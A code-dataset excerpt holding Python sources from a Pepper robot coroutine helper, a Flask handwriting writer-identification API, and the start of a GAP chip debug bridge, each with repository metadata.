{"id": 454, "number": "92", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 455, "number": "93", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 456, "number": "94", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 457, "number": "95", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 458, "number": "96", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 459, "number": "97", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 460, "number": "98", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 461, "number": "99", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 462, "number": "100", "description": "", "score": "2", "group": "V", "groups": ["V"]}, {"id": 463, "number": "101", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 464, "number": "102", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 465, "number": "103", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 466, "number": "104", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 467, "number": "105", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 468, "number": "106", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 469, "number": "107", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 470, "number": "108", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 471, "number": "109", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 472, "number": "110", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 473, "number": "111", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 474, "number": "112", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 475, "number": "113", "description": "", "score": "0", "group": "other", "groups": ["other"]}], "created_at": "2018-08-25T01:09:48.166593Z", "updated_at": "2018-08-25T01:09:48.166648Z", "client_number": "1", "test_type": "cbcl_6_18", "owner": 3}} | 0 | 0 | 0 |
c79dc8d37779a70e8545847151e617acfa37acba | 9,267 | py | Python | app/scripts/dxhomefinder/stk/coroutines.py | softbankrobotics-labs/pepper-proactive-mobility | a9f6132ee5afd9bb6583741d9d4c481bd9597c65 | [
"BSD-3-Clause"
] | 5 | 2020-01-16T22:50:31.000Z | 2021-07-19T19:16:48.000Z | app/scripts/dxhomefinder/stk/coroutines.py | softbankrobotics-labs/pepper-proactive-mobility | a9f6132ee5afd9bb6583741d9d4c481bd9597c65 | [
"BSD-3-Clause"
] | 1 | 2021-06-18T17:45:55.000Z | 2021-06-18T17:45:55.000Z | app/scripts/dxhomefinder/stk/coroutines.py | softbankrobotics-labs/pepper-proactive-mobility | a9f6132ee5afd9bb6583741d9d4c481bd9597c65 | [
"BSD-3-Clause"
] | null | null | null | """
Helper for easily doing async tasks with coroutines.
It's mostly syntactic sugar that removes the need for .then and .andThen.
Simply:
- make a generator function that yields futures (e.g. from qi.async)
- add the decorator async_generator
For example:
@stk.coroutines.async_generator
def run_test(self):
yield ALTextToSpeech.say("ready", _async=True)
yield ALTextToSpeech.say("steady", _async=True)
time.sleep(1)
yield ALTextToSpeech.say("go", _async=True)
... this will turn run_test into a function that returns a future that is
valid when the call is done - and that is still cancelable (your robot will
start speaking).
As your function now returns a future, it can be used in "yield run_test()" in
another function wrapped with this decorator.
"""
__version__ = "0.1.2"
__copyright__ = "Copyright 2017, Aldebaran Robotics / Softbank Robotics Europe"
__author__ = 'ekroeger'
__email__ = 'ekroeger@softbankrobotics.com'
import functools
import time
import threading
import qi
class _MultiFuture(object):
"""Internal helper for handling lists of futures.
The callback will only be called once, with either an exception or a
list of the right type and size.
"""
def __handle_part_done(self, index, future):
"Internal callback for when a sub-function is done."
if self.failed:
# We already raised an exception, don't do anything else.
return
assert self.expecting, "Got more callbacks than expected!"
try:
self.values[index] = future.value()
except Exception as exception:
self.failed = True
self.callback(exception=exception)
return
self.expecting -= 1
if not self.expecting:
# We have all the values
self.callback(self.returntype(self.values))
class FutureWrapper(object):
"Abstract base class for objects that pretend to be a future."
def then(self, callback):
"""Add function to be called when the future is done; returns a future.
The callback will be called with a (finished) future.
"""
if self.running: # We might want a mutex here...
return self.future.then(callback)
else:
callback(self)
# return something? (to see when we have a testcase for this...)
def andThen(self, callback):
"""Add function to be called when the future is done; returns a future.
The callback will be called with a return value (for now, None).
"""
if self.running: # We might want a mutex here...
return self.future.andThen(callback)
else:
callback(self.future.value()) #?
# return something? (to see when we have a testcase for this...)
def hasError(self):
"Was there an error in one of the generator calls?"
return bool(self._exception)
def wait(self):
"Blocks the thread until everything is finished."
self.future.wait()
def isRunning(self):
"Is the sequence of generators still running?"
return self.future.isRunning()
def value(self):
"""Blocks the thread, and returns the final generator return value.
For now, always returns None."""
if self._exception:
raise self._exception
else:
return self.future.value()
def hasValue(self):
"Tells us whether the generator 1) is finished and 2) has a value."
# For some reason this doesn't do what I expected
# self.future.hasValue() returns True even if we're not finished (?)
if self.running:
return False
elif self._exception:
return False
else:
return self.future.hasValue()
def isFinished(self):
"Is the generator finished?"
return self.future.isFinished()
def error(self):
"Returns the error of the future."
return self.future.error()
def isCancelable(self):
"Is this future cancelable? Yes, it always is."
return True
def cancel(self):
"Cancel the future, and stop executing the sequence of actions."
with self.lock:
self.running = False
self.promise.setCanceled()
def isCanceled(self):
"Has this already been cancelled?"
return not self.running
def addCallback(self, callback):
"Add function to be called when the future is done."
self.then(callback)
# You know what? I'm not implementing unwrap() because I don't see a
# use case.
class GeneratorFuture(FutureWrapper):
"Future-like object (same interface) made for wrapping a generator."
def __handle_done(self, future):
"Internal callback for when the current sub-function is done."
try:
self.__ask_for_next(future.value())
except Exception as exception:
self.__ask_for_next(exception=exception)
def __finish(self, value):
"Finish and return."
with self.lock:
self.running = False
self.promise.setValue(value)
def __ask_for_next(self, arg=None, exception=None):
"Internal - get the next function in the generator."
if self.running:
try:
self.sub_future = None # TODO: handle multifuture
if exception:
future = self.generator.throw(exception)
else:
future = self.generator.send(arg)
if isinstance(future, list):
self.sub_future = _MultiFuture(future, self.__ask_for_next, list)
elif isinstance(future, tuple):
self.sub_future = _MultiFuture(future, self.__ask_for_next, tuple)
elif isinstance(future, Return):
# Special case: we returned a special "Return" object
# in this case, stop execution.
self.__finish(future.value)
else:
future.then(self.__handle_done)
self.sub_future = future
except StopIteration:
self.__finish(None)
except Exception as exc:
with self.lock:
self._exception = exc
self.running = False
self.promise.setError(str(exc))
# self.__finish(None) # May not be best way of finishing?
def async_generator(func):
"""Decorator that turns a future-generator into a future.
This allows having a function that does a bunch of async actions one
after the other without awkward "then/andThen" syntax, returning a
future-like object (actually a GeneratorFuture) that can be cancelled, etc.
"""
@functools.wraps(func)
def function(*args, **kwargs):
"Wrapped function"
return GeneratorFuture(func(*args, **kwargs))
return function
def public_async_generator(func):
"""Variant of async_generator that returns an actual future.
This allows you to expose it through a qi interface (on a service), but
that means cancel will not stop the whole chain.
"""
@functools.wraps(func)
def function(*args, **kwargs):
"Wrapped function"
return GeneratorFuture(func(*args, **kwargs)).future
return function
class Return(object):
"Use to wrap a return function "
@async_generator
def broken_sleep(t):
"Helper - async version of time.sleep"
time.sleep(t)
# TODO: instead of blocking a thread do something with qi.async
yield Return(None)
MICROSECONDS_PER_SECOND = 1000000
sleep = _Sleep
| 33.334532 | 89 | 0.629546 | """
Helper for easily doing async tasks with coroutines.
It's mostly syntactic sugar that removes the need for .then and .andThen.
Simply:
- make a generator function that yields futures (e.g. from qi.async)
- add the decorator async_generator
For example:
@stk.coroutines.async_generator
def run_test(self):
yield ALTextToSpeech.say("ready", _async=True)
yield ALTextToSpeech.say("steady", _async=True)
time.sleep(1)
yield ALTextToSpeech.say("go", _async=True)
... this will turn run_test into a function that returns a future that is
valid when the call is done - and that is still cancelable (your robot will
start speaking).
As your function now returns a future, it can be used in "yield run_test()" in
another function wrapped with this decorator.
"""
__version__ = "0.1.2"
__copyright__ = "Copyright 2017, Aldebaran Robotics / Softbank Robotics Europe"
__author__ = 'ekroeger'
__email__ = 'ekroeger@softbankrobotics.com'
import functools
import time
import threading
import qi
class _MultiFuture(object):
"""Internal helper for handling lists of futures.
The callback will only be called once, with either an exception or a
list of the right type and size.
"""
def __init__(self, futures, callback, returntype):
self.returntype = returntype
self.callback = callback
self.expecting = len(futures)
self.values = [None] * self.expecting
self.failed = False
self.futures = futures
for i, future in enumerate(futures):
future.then(lambda fut: self.__handle_part_done(i, fut))
def __handle_part_done(self, index, future):
"Internal callback for when a sub-function is done."
if self.failed:
# We already raised an exception, don't do anything else.
return
assert self.expecting, "Got more callbacks than expected!"
try:
self.values[index] = future.value()
except Exception as exception:
self.failed = True
self.callback(exception=exception)
return
self.expecting -= 1
if not self.expecting:
# We have all the values
self.callback(self.returntype(self.values))
def cancel(self):
for future in self.futures:
future.cancel()
class FutureWrapper(object):
"Abstract base class for objects that pretend to be a future."
def __init__(self):
self.running = True
self.promise = qi.Promise()
self.future = self.promise.future()
self._exception = ""
self.lock = threading.Lock()
def then(self, callback):
"""Add function to be called when the future is done; returns a future.
The callback will be called with a (finished) future.
"""
if self.running: # We might want a mutex here...
return self.future.then(callback)
else:
callback(self)
# return something? (to see when we have a testcase for this...)
def andThen(self, callback):
"""Add function to be called when the future is done; returns a future.
The callback will be called with a return value (for now, None).
"""
if self.running: # We might want a mutex here...
return self.future.andThen(callback)
else:
callback(self.future.value()) #?
# return something? (to see when we have a testcase for this...)
def hasError(self):
"Was there an error in one of the generator calls?"
return bool(self._exception)
def wait(self):
"Blocks the thread until everything is finished."
self.future.wait()
def isRunning(self):
"Is the sequence of generators still running?"
return self.future.isRunning()
def value(self):
"""Blocks the thread, and returns the final generator return value.
For now, always returns None."""
if self._exception:
raise self._exception
else:
return self.future.value()
def hasValue(self):
"Tells us whether the generator 1) is finished and 2) has a value."
# For some reason this doesn't do what I expected
# self.future.hasValue() returns True even if we're not finished (?)
if self.running:
return False
elif self._exception:
return False
else:
return self.future.hasValue()
def isFinished(self):
"Is the generator finished?"
return self.future.isFinished()
def error(self):
"Returns the error of the future."
return self.future.error()
def isCancelable(self):
"Is this future cancelable? Yes, it always is."
return True
def cancel(self):
"Cancel the future, and stop executing the sequence of actions."
with self.lock:
self.running = False
self.promise.setCanceled()
def isCanceled(self):
"Has this already been cancelled?"
return not self.running
def addCallback(self, callback):
"Add function to be called when the future is done."
self.then(callback)
# You know what? I'm not implementing unwrap() because I don't see a
# use case.
class GeneratorFuture(FutureWrapper):
"Future-like object (same interface) made for wrapping a generator."
def __init__(self, generator):
FutureWrapper.__init__(self)
self.generator = generator
self.future.addCallback(self.__handle_finished)
self.sub_future = None
self.__ask_for_next()
def __handle_finished(self, future):
if self.running:
# promised was directly finished by someone else - cancel what we were doing!
self.running = False
if self.sub_future:
self.sub_future.cancel()
def __handle_done(self, future):
"Internal callback for when the current sub-function is done."
try:
self.__ask_for_next(future.value())
except Exception as exception:
self.__ask_for_next(exception=exception)
def __finish(self, value):
"Finish and return."
with self.lock:
self.running = False
self.promise.setValue(value)
def __ask_for_next(self, arg=None, exception=None):
"Internal - get the next function in the generator."
if self.running:
try:
self.sub_future = None # TODO: handle multifuture
if exception:
future = self.generator.throw(exception)
else:
future = self.generator.send(arg)
if isinstance(future, list):
self.sub_future = _MultiFuture(future, self.__ask_for_next, list)
elif isinstance(future, tuple):
self.sub_future = _MultiFuture(future, self.__ask_for_next, tuple)
elif isinstance(future, Return):
# Special case: we returned a special "Return" object
# in this case, stop execution.
self.__finish(future.value)
else:
future.then(self.__handle_done)
self.sub_future = future
except StopIteration:
self.__finish(None)
except Exception as exc:
with self.lock:
self._exception = exc
self.running = False
self.promise.setError(str(exc))
# self.__finish(None) # May not be best way of finishing?
def async_generator(func):
"""Decorator that turns a future-generator into a future.
This allows having a function that does a bunch of async actions one
after the other without awkward "then/andThen" syntax, returning a
future-like object (actually a GeneratorFuture) that can be cancelled, etc.
"""
@functools.wraps(func)
def function(*args, **kwargs):
"Wrapped function"
return GeneratorFuture(func(*args, **kwargs))
return function
def public_async_generator(func):
"""Variant of async_generator that returns an actual future.
This allows you to expose it through a qi interface (on a service), but
that means cancel will not stop the whole chain.
"""
@functools.wraps(func)
def function(*args, **kwargs):
"Wrapped function"
return GeneratorFuture(func(*args, **kwargs)).future
return function
class Return(object):
"Use to wrap a return function "
def __init__(self, value):
self.value = value
@async_generator
def broken_sleep(t):
"Helper - async version of time.sleep"
time.sleep(t)
# TODO: instead of blocking a thread do something with qi.async
yield Return(None)
MICROSECONDS_PER_SECOND = 1000000
class _Sleep(FutureWrapper):
def __init__(self, time_in_secs):
FutureWrapper.__init__(self)
time_in_microseconds = int(MICROSECONDS_PER_SECOND * time_in_secs)
self.toto = qi.async(self.set_finished, delay=time_in_microseconds)
def set_finished(self):
with self.lock:
self.promise.setValue(None)
sleep = _Sleep
| 1,320 | 7 | 234 |
f684d2fa6876886e9049ae01821730a76d6c747f | 11,049 | py | Python | server/controllers/rootcontroller.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 2 | 2019-10-16T07:37:46.000Z | 2020-10-04T10:31:02.000Z | server/controllers/rootcontroller.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 3 | 2021-03-19T00:22:56.000Z | 2022-01-13T01:12:35.000Z | server/controllers/rootcontroller.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 2 | 2019-06-04T10:58:39.000Z | 2019-06-06T18:52:01.000Z | import uuid
from flask import Flask, request, jsonify, send_from_directory
from flask_socketio import SocketIO
from server.httpexceptions.exceptions import ExceptionHandler
from server.services.writerservice import *
from server.utils.writerencoder import *
import time
app = Flask(__name__)
socket = SocketIO(app, async_mode='threading')
writer_service = WriterService(socket)
UPLOAD_FOLDER = os.path.join(os.path.dirname(__file__), '../../uploads/')
dataset_path = os.path.join(os.path.dirname(__file__), '../../../All Test Cases/')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.json_encoder = WriterEncoder
@app.errorhandler(ExceptionHandler)
def handle_invalid_usage(error):
"""
Error Handler for class Exception Handler
:param error:
:return: response containing:
status code, message, and data
"""
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route("/writers", methods=['GET'])
def get_writers_not_none():
"""
API to get all writers for predition where features not none
:raise: Exception containing:
message:
- "OK" for success
- "No writers found" if there is no writer
status_code:
- 200 for success
- 404 if there is no writer
data:
- list of WritersVo: each writervo contains id, name, username
- None if there is no writer
"""
# # global thread
# # with thread_lock:
# # if thread is None:
# thread = socket.start_background_task(background_thread)
language = request.args.get('lang', None)
if language == 'en':
status_code, message, data = writer_service.get_writers_not_none()
else:
status_code, message, data = writer_service.get_writers_arabic_not_none()
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=data)
@app.route("/allWriters", methods=['GET'])
def get_writers():
"""
API to get all writers for training *Language independent
:raise: Exception containing:
message:
- "OK" for success
- "No writers found" if there is no writer
status_code:
- 200 for success
- 404 if there is no writer
data:
- list of WritersVo: each writervo contains id, name, username
- None if there is no writer
"""
status_code, message, data = writer_service.get_all_writers()
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=data)
@app.route("/fitClassifiers", methods=['GET'])
def fit_classifiers():
"""
API to get fit classifiers for training *Language independent
:raise: Exception containing:
message:
- "OK" for success
status_code:
- 200 for success
"""
language = request.args.get('lang', None)
status_code, message = writer_service.fit_classifiers(language)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
@app.route("/predict", methods=['POST'])
def get_prediction():
"""
API for predicting a writer of the image
:parameter: Query parameter lang
- en for english
- ar for arabic
:parameter: request contains
- writers ids: writers_ids
- image name: _filename
:raise: Exception contains
- response message:
"OK" for success, "Error in prediction" for prediction conflict,"Maximum number of writers exceeded" for exceeding maximum numbers
- response status code:
200 for success, 500 for prediction conflict,400 for exceeding maximum number
"""
print("New prediction request")
try:
# get image from request
filename = request.get_json()['_filename']
testing_image = cv2.imread(UPLOAD_FOLDER + 'testing/' + filename)
# get features of the writers
# writers_ids = request.get_json()['writers_ids']
language = request.args.get('lang', None)
image_base_url = request.host_url + 'image/writers/'
if language == "ar":
status, message, writers_predicted = writer_service.predict_writer_arabic(testing_image, filename,
image_base_url)
else:
status, message, writers_predicted = writer_service.predict_writer(testing_image, filename, image_base_url)
time.sleep(60)
raise ExceptionHandler(message=message.value, status_code=status.value,
data=writers_predicted)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.CONFLICT_PREDICTION.value, status_code=HttpErrors.CONFLICT.value)
@app.route("/writer", methods=['POST'])
def create_writer():
"""
API for creating a new writer
:parameter: request contains
- writer name: _name
- writer username: _username
- image name: _image
- address: _address
- phone: _phone
- national id: _nid
:raise: Exception contains
- response message:
"OK" for success, "Writer already exists" for duplicate username
- response status code:
200 for success, 409 for duplicate username
"""
# request parameters
new_writer = request.get_json()
status_code, message = validate_writer_request(new_writer)
writer_id = None
if status_code.value == 200:
status_code, message, writer_id = writer_service.add_writer(new_writer)
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=writer_id)
@app.route("/profile", methods=['GET'])
def get_profile():
"""
API to get writer's profile
:parameter: Query parameter id
Query parameter lang
- en for english
- ar for arabic
:raise: Exception containing:
message:
- "OK" for success
- "Writer is not found" if writer does not exist
status_code:
- 200 for success
- 404 if writer does not exist
data:
- ProfileVo object containing writer's: id, name, username, address, phone, nid
- None if writer does not exist
"""
writer_id = request.args.get('id', None)
status_code, message, profile_vo = writer_service.get_writer_profile(writer_id, request.host_url)
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=profile_vo)
@app.route("/image/<path>", methods=['POST'])
def upload_image(path):
"""
API for uploading images
request: image: file of the image
:param: path: path variable to identify the folder to upload in
- writers: for writers
- testing: for testing
- training: for training
:raise: Exception contains
- response message:
"OK" for success, "Upload image failed" for any fail in upload
- response status code:
200 for success, 409 for any fail in upload
"""
try:
path = request.view_args['path']
image = request.files["image"]
image_name = str(uuid.uuid1()) + '.jpg'
image.save(UPLOAD_FOLDER + path + '/' + image_name)
raise ExceptionHandler(message=HttpMessages.SUCCESS.value, status_code=HttpErrors.SUCCESS.value,
data=image_name)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.UPLOADFAIL.value, status_code=HttpErrors.CONFLICT.value)
@app.route("/image/<path>/<filename>", methods=['GET'])
def get_image(path, filename):
"""
API to get the image
:param path: path variable for folder to get the image from
- writers: for writers
- testing: for testing
- training: for training
:param filename: path variable for image name
:return: url for image in case found, url fo image not found in case not found
"""
try:
path = request.view_args['path'] + '/' + request.view_args['filename']
return send_from_directory(UPLOAD_FOLDER, path)
except:
path = request.view_args['path'] + '/not_found.png'
return send_from_directory(UPLOAD_FOLDER, path)
# raise ExceptionHandler(message=HttpMessages.IMAGENOTFOUND.value, status_code=HttpErrors.NOTFOUND.value)
@app.route("/writer", methods=['PUT'])
def update_writer_features():
"""
API for updating a writer features
:parameter: Query parameter lang
- en for english
- ar for arabic
:parameter: request contains
- image name: _filename
- writer id: _id
:raise: Exception contains
- response message:
"OK" for success, "Not found" for image not found
- response status code:
200 for success, 400 for image not found
"""
try:
# get image from request
filename = request.get_json()['_filename']
training_image = cv2.imread(UPLOAD_FOLDER + 'training/' + filename)
# get writer
writer_id = int(request.get_json()['_id'])
language = request.args.get('lang', None)
if language == "ar":
status_code, message = writer_service.update_features_arabic(training_image, filename, writer_id)
else:
status_code, message = writer_service.update_features(training_image, filename, writer_id)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.NOTFOUND.value, status_code=HttpErrors.NOTFOUND.value)
@app.route("/setWriters")
def set_writers():
"""
API for filling database collection with dummy data
:parameter Query parameter lang
- en for english
- ar for arabic
:raise: Exception contains
- response message:
"OK" for success
- response status code:
200 for success
"""
start_class = 1
end_class = 300
language = request.args.get('lang', None)
if language == "ar":
base_path = dataset_path + 'KHATT/Samples/Class'
status_code, message = writer_service.fill_collection_arabic(start_class, end_class, base_path)
else:
base_path = dataset_path + 'Dataset/Training/Class'
status_code, message = writer_service.fill_collection(start_class, end_class, base_path)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
if __name__ == '__main__':
writer_service.fit_classifiers()
print("Classifiers are fitted!")
socket.run(app)
| 35.07619 | 148 | 0.630736 | import uuid
from flask import Flask, request, jsonify, send_from_directory
from flask_socketio import SocketIO
from server.httpexceptions.exceptions import ExceptionHandler
from server.services.writerservice import *
from server.utils.writerencoder import *
import time
app = Flask(__name__)
socket = SocketIO(app, async_mode='threading')
writer_service = WriterService(socket)
UPLOAD_FOLDER = os.path.join(os.path.dirname(__file__), '../../uploads/')
dataset_path = os.path.join(os.path.dirname(__file__), '../../../All Test Cases/')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.json_encoder = WriterEncoder
@app.errorhandler(ExceptionHandler)
def handle_invalid_usage(error):
"""
Error Handler for class Exception Handler
:param error:
:return: response containing:
status code, message, and data
"""
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route("/writers", methods=['GET'])
def get_writers_not_none():
"""
API to get all writers for predition where features not none
:raise: Exception containing:
message:
- "OK" for success
- "No writers found" if there is no writer
status_code:
- 200 for success
- 404 if there is no writer
data:
- list of WritersVo: each writervo contains id, name, username
- None if there is no writer
"""
# # global thread
# # with thread_lock:
# # if thread is None:
# thread = socket.start_background_task(background_thread)
language = request.args.get('lang', None)
if language == 'en':
status_code, message, data = writer_service.get_writers_not_none()
else:
status_code, message, data = writer_service.get_writers_arabic_not_none()
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=data)
@app.route("/allWriters", methods=['GET'])
def get_writers():
"""
API to get all writers for training *Language independent
:raise: Exception containing:
message:
- "OK" for success
- "No writers found" if there is no writer
status_code:
- 200 for success
- 404 if there is no writer
data:
- list of WritersVo: each writervo contains id, name, username
- None if there is no writer
"""
status_code, message, data = writer_service.get_all_writers()
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=data)
@app.route("/fitClassifiers", methods=['GET'])
def fit_classifiers():
"""
API to get fit classifiers for training *Language independent
:raise: Exception containing:
message:
- "OK" for success
status_code:
- 200 for success
"""
language = request.args.get('lang', None)
status_code, message = writer_service.fit_classifiers(language)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
@app.route("/predict", methods=['POST'])
def get_prediction():
"""
API for predicting a writer of the image
:parameter: Query parameter lang
- en for english
- ar for arabic
:parameter: request contains
- writers ids: writers_ids
- image name: _filename
:raise: Exception contains
- response message:
"OK" for success, "Error in prediction" for prediction conflict,"Maximum number of writers exceeded" for exceeding maximum numbers
- response status code:
200 for success, 500 for prediction conflict,400 for exceeding maximum number
"""
print("New prediction request")
try:
# get image from request
filename = request.get_json()['_filename']
testing_image = cv2.imread(UPLOAD_FOLDER + 'testing/' + filename)
# get features of the writers
# writers_ids = request.get_json()['writers_ids']
language = request.args.get('lang', None)
image_base_url = request.host_url + 'image/writers/'
if language == "ar":
status, message, writers_predicted = writer_service.predict_writer_arabic(testing_image, filename,
image_base_url)
else:
status, message, writers_predicted = writer_service.predict_writer(testing_image, filename, image_base_url)
time.sleep(60)
raise ExceptionHandler(message=message.value, status_code=status.value,
data=writers_predicted)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.CONFLICT_PREDICTION.value, status_code=HttpErrors.CONFLICT.value)
@app.route("/writer", methods=['POST'])
def create_writer():
"""
API for creating a new writer
:parameter: request contains
- writer name: _name
- writer username: _username
- image name: _image
- address: _address
- phone: _phone
- national id: _nid
:raise: Exception contains
- response message:
"OK" for success, "Writer already exists" for duplicate username
- response status code:
200 for success, 409 for duplicate username
"""
# request parameters
new_writer = request.get_json()
status_code, message = validate_writer_request(new_writer)
writer_id = None
if status_code.value == 200:
status_code, message, writer_id = writer_service.add_writer(new_writer)
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=writer_id)
@app.route("/profile", methods=['GET'])
def get_profile():
"""
API to get writer's profile
:parameter: Query parameter id
Query parameter lang
- en for english
- ar for arabic
:raise: Exception containing:
message:
- "OK" for success
- "Writer is not found" if writer does not exist
status_code:
- 200 for success
- 404 if writer does not exist
data:
- ProfileVo object containing writer's: id, name, username, address, phone, nid
- None if writer does not exist
"""
writer_id = request.args.get('id', None)
status_code, message, profile_vo = writer_service.get_writer_profile(writer_id, request.host_url)
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=profile_vo)
@app.route("/image/<path>", methods=['POST'])
def upload_image(path):
"""
API for uploading images
request: image: file of the image
:param: path: path variable to identify the folder to upload in
- writers: for writers
- testing: for testing
- training: for training
:raise: Exception contains
- response message:
"OK" for success, "Upload image failed" for any fail in upload
- response status code:
200 for success, 409 for any fail in upload
"""
try:
path = request.view_args['path']
image = request.files["image"]
image_name = str(uuid.uuid1()) + '.jpg'
image.save(UPLOAD_FOLDER + path + '/' + image_name)
raise ExceptionHandler(message=HttpMessages.SUCCESS.value, status_code=HttpErrors.SUCCESS.value,
data=image_name)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.UPLOADFAIL.value, status_code=HttpErrors.CONFLICT.value)
@app.route("/image/<path>/<filename>", methods=['GET'])
def get_image(path, filename):
"""
API to get the image
:param path: path variable for folder to get the image from
- writers: for writers
- testing: for testing
- training: for training
:param filename: path variable for image name
:return: url for image in case found, url fo image not found in case not found
"""
try:
path = request.view_args['path'] + '/' + request.view_args['filename']
return send_from_directory(UPLOAD_FOLDER, path)
except:
path = request.view_args['path'] + '/not_found.png'
return send_from_directory(UPLOAD_FOLDER, path)
# raise ExceptionHandler(message=HttpMessages.IMAGENOTFOUND.value, status_code=HttpErrors.NOTFOUND.value)
@app.route("/writer", methods=['PUT'])
def update_writer_features():
"""
API for updating a writer features
:parameter: Query parameter lang
- en for english
- ar for arabic
:parameter: request contains
- image name: _filename
- writer id: _id
:raise: Exception contains
- response message:
"OK" for success, "Not found" for image not found
- response status code:
200 for success, 400 for image not found
"""
try:
# get image from request
filename = request.get_json()['_filename']
training_image = cv2.imread(UPLOAD_FOLDER + 'training/' + filename)
# get writer
writer_id = int(request.get_json()['_id'])
language = request.args.get('lang', None)
if language == "ar":
status_code, message = writer_service.update_features_arabic(training_image, filename, writer_id)
else:
status_code, message = writer_service.update_features(training_image, filename, writer_id)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.NOTFOUND.value, status_code=HttpErrors.NOTFOUND.value)
@app.route("/setWriters")
def set_writers():
"""
API for filling database collection with dummy data
:parameter Query parameter lang
- en for english
- ar for arabic
:raise: Exception contains
- response message:
"OK" for success
- response status code:
200 for success
"""
start_class = 1
end_class = 300
language = request.args.get('lang', None)
if language == "ar":
base_path = dataset_path + 'KHATT/Samples/Class'
status_code, message = writer_service.fill_collection_arabic(start_class, end_class, base_path)
else:
base_path = dataset_path + 'Dataset/Training/Class'
status_code, message = writer_service.fill_collection(start_class, end_class, base_path)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
if __name__ == '__main__':
writer_service.fit_classifiers()
print("Classifiers are fitted!")
socket.run(app)
| 0 | 0 | 0 |
8371355d0547c59f1233c5ac2c2cbfc5c23fb02f | 5,484 | py | Python | python/bridge/chips/gap_rev1.py | VivoSoC/pulp-debug-bridge | de23caa48c4c69d1f639a33d913089f926b71e70 | [
"Apache-2.0"
] | null | null | null | python/bridge/chips/gap_rev1.py | VivoSoC/pulp-debug-bridge | de23caa48c4c69d1f639a33d913089f926b71e70 | [
"Apache-2.0"
] | null | null | null | python/bridge/chips/gap_rev1.py | VivoSoC/pulp-debug-bridge | de23caa48c4c69d1f639a33d913089f926b71e70 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) 2018 ETH Zurich and University of Bologna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Germain Haugou, ETH (germain.haugou@iis.ee.ethz.ch)
from bridge.default_debug_bridge import *
import time
JTAG_SOC_AXIREG = 4
JTAG_SOC_CONFREG = 7
JTAG_SOC_CONFREG_WIDTH = 4
BOOT_MODE_JTAG = 1
BOOT_MODE_JTAG_HYPER = 11
CONFREG_BOOT_WAIT = 1
CONFREG_PGM_LOADED = 1
CONFREG_INIT = 0
| 33.851852 | 122 | 0.632932 | #
# Copyright (C) 2018 ETH Zurich and University of Bologna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Germain Haugou, ETH (germain.haugou@iis.ee.ethz.ch)
from bridge.default_debug_bridge import *
import time
JTAG_SOC_AXIREG = 4
JTAG_SOC_CONFREG = 7
JTAG_SOC_CONFREG_WIDTH = 4
BOOT_MODE_JTAG = 1
BOOT_MODE_JTAG_HYPER = 11
CONFREG_BOOT_WAIT = 1
CONFREG_PGM_LOADED = 1
CONFREG_INIT = 0
class gap_debug_bridge(debug_bridge):
def __init__(self, config, binaries=[], verbose=False, fimages=[]):
